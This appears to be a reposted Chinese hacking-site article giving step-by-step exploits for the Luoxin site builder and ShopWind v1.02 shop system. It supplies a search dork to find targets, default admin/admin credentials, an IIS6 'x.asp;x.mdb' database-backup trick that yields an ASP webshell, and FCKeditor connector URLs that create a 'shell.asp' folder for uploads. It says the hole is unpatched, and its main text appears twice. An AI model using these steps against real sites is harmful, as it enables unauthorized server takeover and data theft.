您现在的位置是:网站首页> 编程资料编程资料
ShopWind网店系统与罗信网络建站 v1.02 上传漏洞_漏洞分析_网络安全_
2023-05-24
300人已围观
简介 ShopWind网店系统与罗信网络建站 v1.02 上传漏洞_漏洞分析_网络安全_
罗信网络建站系统oDAY
百度 or google "技术支持:罗信网络"
后台地址: site+lx
数据库地址: site+lx+databases+主域名.asp(需要猜测)
帐号&密码: admin admin
下来就是拿shell
重要部分: 上传jpg格式的asp马
数据库备份,请注意,这里只能备份后缀为mdb格式的.
那我们怎么备份呢?
还记得之前x.asp;x.jpg格式吗?
对 我们依靠这个 备份格式为: x.asp;x.mdb
OK之后访问我们的备份shell
在线编辑器: site+/lx/edit/admin_login.asp
在线编辑器数据库地址 site/lx/edit/db/%23edit.mdb
注释:官方未修补
====================YD分界线====================
ShopWind网店系统 v1.02 上传漏洞
Author:Lan3a
这个程序用的是FCKeditor 编辑器
利用2003的解析问题。直接说利用方法!
第一步:
FCKeditor/editor/filemanager/connectors/asp/connector.asp?Command=CreateFolder&Type=Image&CurrentFolder=%2Fshell.asp&NewFolderName=z&uuid=1244789975684
第二步:
fckeditor/editor/filemanager/browser/default/browser.html?Type=Image&Connector=../../connectors/asp/connector.asp
百度 or google "技术支持:罗信网络"
后台地址: site+lx
数据库地址: site+lx+databases+主域名.asp(需要猜测)
帐号&密码: admin admin
下来就是拿shell
重要部分: 上传jpg格式的asp马
数据库备份,请注意,这里只能备份后缀为mdb格式的.
那我们怎么备份呢?
还记得之前x.asp;x.jpg格式吗?
对 我们依靠这个 备份格式为: x.asp;x.mdb
OK之后访问我们的备份shell
在线编辑器: site+/lx/edit/admin_login.asp
在线编辑器数据库地址 site/lx/edit/db/%23edit.mdb
注释:官方未修补
====================YD分界线====================
ShopWind网店系统 v1.02 上传漏洞
Author:Lan3a
这个程序用的是FCKeditor 编辑器
利用2003的解析问题。直接说利用方法!
第一步:
FCKeditor/editor/filemanager/connectors/asp/connector.asp?Command=CreateFolder&Type=Image&CurrentFolder=%2Fshell.asp&NewFolderName=z&uuid=1244789975684
第二步:
fckeditor/editor/filemanager/browser/default/browser.html?Type=Image&Connector=../../connectors/asp/connector.asp
相关内容
- eWebEditor 6.2 目录遍历漏洞(asp/browse.asp)_漏洞分析_网络安全_
- 最新win2003 II6解析漏洞实战及应用_漏洞分析_网络安全_
- 微软警告:泄露的Office 2010预览版或含病毒_漏洞分析_网络安全_
- 谨防黑客利用微软DirectShow漏洞传播木马_漏洞分析_网络安全_
- 微软称黑客利用非官方版Windows 7兴风作浪_漏洞分析_网络安全_
- phpwin7.0拿shell的方法_漏洞分析_网络安全_
- PHPWIND & DISCUZ! CSRF漏洞_漏洞分析_网络安全_
- phpcms2008 注入漏洞_漏洞分析_网络安全_
- 校内网最新 xss Cookies得到密码_漏洞分析_网络安全_
- 微软IIS6漏洞:服务器敏感信息易被窃_漏洞分析_网络安全_
